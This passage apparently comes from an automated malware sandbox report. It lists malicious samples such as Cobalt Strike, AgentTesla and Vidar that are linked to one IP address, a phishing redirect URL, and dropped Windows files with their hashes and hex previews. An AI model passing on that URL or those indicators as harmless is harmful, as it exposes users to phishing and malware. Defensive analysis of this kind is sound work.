                                                                                                                                                                                                                                        Sentinelled.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 147.75.81.6
                                                                                                                                                                                                                                        mniscreenthinkinggoodforentiretimegoodfotbusubessthings.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                                                                                        • 147.75.81.6
                                                                                                                                                                                                                                        QUOTATION#008792.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • 147.75.81.6
                                                                                                                                                                                                                                        Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                        • 147.75.81.6
                                                                                                                                                                                                                                        https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 147.75.81.6
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                                                                                        • 147.75.81.6
                                                                                                                                                                                                                                        ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                        • 147.75.81.6
                                                                                                                                                                                                                                        https://kubota.highq.com/kubota/externalAccess.action?linkParam=248Md4JKaxiIU4vwlQaNq5FLgPVNq03doY6pcXaLJD4%3D&documentDownload=linkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 147.75.81.6

                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                        Entropy (8bit):0.8307490073670308
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugA:gJjJGtpTq2yv1AuNZRY3diu8iBVqFy
                                                                                                                                                                                                                                        MD5:4B62C198AB9809F2BB6AE23120B9CD0B
                                                                                                                                                                                                                                        SHA1:04481181E0196E9BF0DFD7AF3C3D21DAADB5322A
                                                                                                                                                                                                                                        SHA-256:7AD00D65681B5BD61D422E7F1C214CA17F8E5D3ED236394493E71CCBAF9A471C
                                                                                                                                                                                                                                        SHA-512:EA3D7BDEE287EDC2CAB0477F2750DC19BC966151C72F77C56E2BA478707698352A7DD82178D0EA6F274115B6D7A0F5EBA96091E5EBFA50B7F446C7BFB53D95E3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9a7983ab, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                        Entropy (8bit):0.6586036868915569
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                        MD5:0488857AD766E2A8673A49EF1A84E8CC
                                                                                                                                                                                                                                        SHA1:8D625F378C1A02E67C21ACC249199D31937D57BC
                                                                                                                                                                                                                                        SHA-256:6044A3F09797AD637571AF3A1622A6DE24946DA371FC54EBAAECAC7F18C3EEA7
                                                                                                                                                                                                                                        SHA-512:D67DD0CAD7D832E5D7AC1C4CA544F4B8F0ED76C82DE9E2332314C9C9B06F92426C65FB2CED711FBB6597742226A62456A911D4156FD875E324ED27DAB7D45509
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.y..... ...............X\...;...{......................0.z..........{.......|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................W..\.....|....................J.....|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                        Entropy (8bit):0.08154834791836038
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:R7/lKYeLJ4kGuAJkhvekl1eJWwllrekGltll/SPj:dtKzLZrxlERJe3l
                                                                                                                                                                                                                                        MD5:889F1A4BB18A100A0CE6C4A966AA44E0
                                                                                                                                                                                                                                        SHA1:B83FED902BD9792ECDA0E43710A9120B04C074A0
                                                                                                                                                                                                                                        SHA-256:2727B0DEB2CCDBB0F6FB9D6B05FC9AC493D6F80ABBC1CC471C215590C07386D3
                                                                                                                                                                                                                                        SHA-512:F5BF0DA09D0DD0578EC5613DD8290EC6C666E12D8DF054931E7EA88A8DC833A721F4EAA4C3D8BF1277DAB4118465045B1A7FE008876675400112C67D802CB71D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.m.......................................;...{.......|.......{...............{.......{...XL......{.....................J.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_P0RN-vidz.Client_6e3e90e0d99a74f4fe8713d957d27e16c7ef559e_212624ca_329575c1-7b3a-4de6-ae6b-7544056bae2f\Report.wer

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                        Entropy (8bit):0.9185168783864288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:IipFgb/sK1ZsihmGXyf8QXIDcQvc6QcEVcw3cE/3+HbHg/Jg+OgBCXEYcI+16FJM:Ry1Zu0BU/Qjq0ozuiFJZ24IO8L
                                                                                                                                                                                                                                        MD5:1F1B148853DE8B9488B8C465EE85F163
                                                                                                                                                                                                                                        SHA1:746734432B62C48AB8A62AFE6B002E3EB490781D
                                                                                                                                                                                                                                        SHA-256:B5FC9ACCD49B44B08E3A0C996F7CC7CD9E3D2699413DFE385807806ABF969026
                                                                                                                                                                                                                                        SHA-512:58C44BC30ABE2D4690059FBE40D32EEAE00FDE4CD9274264E91C55945545288F53AE641DD4D499454AB3085A815E3EDA8986BC518558AC145EDB86FFD4BFC423
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.8.9.4.5.5.8.5.2.4.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.8.9.4.7.2.4.1.5.0.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.9.5.7.5.c.1.-.7.b.3.a.-.4.d.e.6.-.a.e.6.b.-.7.5.4.4.0.5.6.b.a.e.2.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.0.c.c.c.d.1.-.2.4.5.a.-.4.2.9.2.-.9.d.6.8.-.f.6.4.d.7.b.5.1.c.4.7.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.0.R.N.-.v.i.d.z...C.l.i.e.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.5.2.5.b.-.2.d.b.c.0.3.5.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.2.9.2.e.b.9.4.3.a.c.0.c.0.c.a.f.c.6.e.0.7.0.4.d.0.4.c.8.8.5.b.0.0.0.0.f.f.f.f.!.0.0.0.0.c.6.f.5.7.c.4.4.c.f.e.1.5.d.2.1.9.b.e.b.0.6.6.a.2.0.9.8.3.6.7.e.8.7.5.0.c.0.d.4.!.P.0.R.N.-.v.i.d.z...C.l.i.e.n.t...e.x.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3654.tmp.dmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 17:22:25 2024, 0x1205a4 type
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):80112
                                                                                                                                                                                                                                        Entropy (8bit):1.7170666045026854
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:y9DnGhI/LyIBTgx/4N/ygeA+C80wx91R/:y9DnD6Z5g+xzr/
                                                                                                                                                                                                                                        MD5:A428B161A50E731BB4FA120555EDE07F
                                                                                                                                                                                                                                        SHA1:C7EEF92198FF5BE65A73358FD508A240DCA60CBB
                                                                                                                                                                                                                                        SHA-256:9127E8F1DAF054DF9F56E3BE0F554498435A4BCDBD49A84DEC50B694B8F54B1D
                                                                                                                                                                                                                                        SHA-512:F8947FFAF4FA2570142CACE43C09118AB9C4EA580905D3969E4A486AE08EA8E635F53940383121618D2E629FEF42A589DEAF97BC3D48231B2A5F1F9DB11A5B7A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MDMP..a..... ........eg....................................$....;..........T.......8...........T............!..p........... ...........................................................................................eJ..............GenuineIntel............T.......|....eg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER37AC.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8354
                                                                                                                                                                                                                                        Entropy (8bit):3.6980075679375655
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJPQ69DT6YEI3SU9RUxgmf8t4prV89btHsfJPm:R6lXJY69DT6YE4SU9RUxgmf8tXtMfM
                                                                                                                                                                                                                                        MD5:91F0DE8504D87E85FDBFFB890C874F05
                                                                                                                                                                                                                                        SHA1:57AAAB98A2BEDC659AEF865EBAE842E1372E01C9
                                                                                                                                                                                                                                        SHA-256:C2703A11598C5ECE8863CE94364DF5ADB090DFEEF80B978E21ADC02705AEBD09
                                                                                                                                                                                                                                        SHA-512:174A80D817F3A9E398932FCF75997ADD0538BEC44342A04D3D00B4CA31B41AC546625CF0DEDDFD9355C1AC02984677A21BA19803A501F97D5D7773CAAF1D5860
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER39C1.tmp.xml

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4623
                                                                                                                                                                                                                                        Entropy (8bit):4.489471167391645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsNJg77aI9idWpW8VYZYm8M4JwVLSLFxM+q8A2gJDgPwd:uIjfnI7Ys7VdJwfpDgPwd
                                                                                                                                                                                                                                        MD5:B5BFA812CBB3C942343CA0DAD50211C3
                                                                                                                                                                                                                                        SHA1:75AEA5A7ED125D2237BC3A027D2278A3705B8136
                                                                                                                                                                                                                                        SHA-256:D6FCDA76DA7BC8A6483589CF3D8E3B297695F39A5FDA063A14FD709AFA4B7F3F
                                                                                                                                                                                                                                        SHA-512:92A67A4374CF586BBC5BF6A4718E5F8A6CB62BFD91E1DEBCB29DE1E6B1C8522246F6B705DFA8FC84AC632779E2D858915FE7172DA8E98D6E8A1A350FFA0CEDEC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639865" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER39ED.tmp.csv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):83964
                                                                                                                                                                                                                                        Entropy (8bit):3.0639725640132136
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:iwYBzuKGo0rJaPMMZatQ4Xd1zr67mu56rP/:iwYBzuKGo0rJaPMMZatQ4Xd1zr67mu5s
                                                                                                                                                                                                                                        MD5:D89D2F782EB3E2237257B3741732D4ED
                                                                                                                                                                                                                                        SHA1:DD0D0B545D2B19217168E69839848FAE7063BC00
                                                                                                                                                                                                                                        SHA-256:B7EBBF553C5C5635F09A4C30CC7548AA4A1F29CA43350435CEED5C7C38255C75
                                                                                                                                                                                                                                        SHA-512:F47E7CCBDE665808FAE162B55496F2EB99DC7D61A72505C99F05C2DE0A6F373490F522B481941FB0EBDB5BF71F4CA8C0A384AB081155974765659B9699827720
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C5F.tmp.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.684677565562834
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYWtJ6ayp2FPHYRSYUWzH4YEZs/Ht8i0LXCNwD2daoVs+M9JUI2h3:2ZDtIaHzAiaaoVs+M9JD2h3
                                                                                                                                                                                                                                        MD5:034CFE3D5FF19E57C12CEFB6190F906E
                                                                                                                                                                                                                                        SHA1:5C7C3D1BE82ACD49CD149332A596C8E45A1F63BE
                                                                                                                                                                                                                                        SHA-256:7AC1C87FE01214E9CF3176C47FC2B46A1EF8AB2DA81BAF43D6461C276E40F484
                                                                                                                                                                                                                                        SHA-512:274F4CED440471FC6FEC6254B579FCD84A58905653D80593C4BC8D0384614C032124605615966E32C826C3E20EEFAB9EA858CC1BEBAFBF0B6AF444106B453537
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4761
                                                                                                                                                                                                                                        Entropy (8bit):7.945585251880973
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                                                                                                                                                                                                                                        MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                                                                                                                                                                                                                                        SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                                                                                                                                                                                                                                        SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                                                                                                                                                                                                                                        SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....

                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1716
                                                                                                                                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
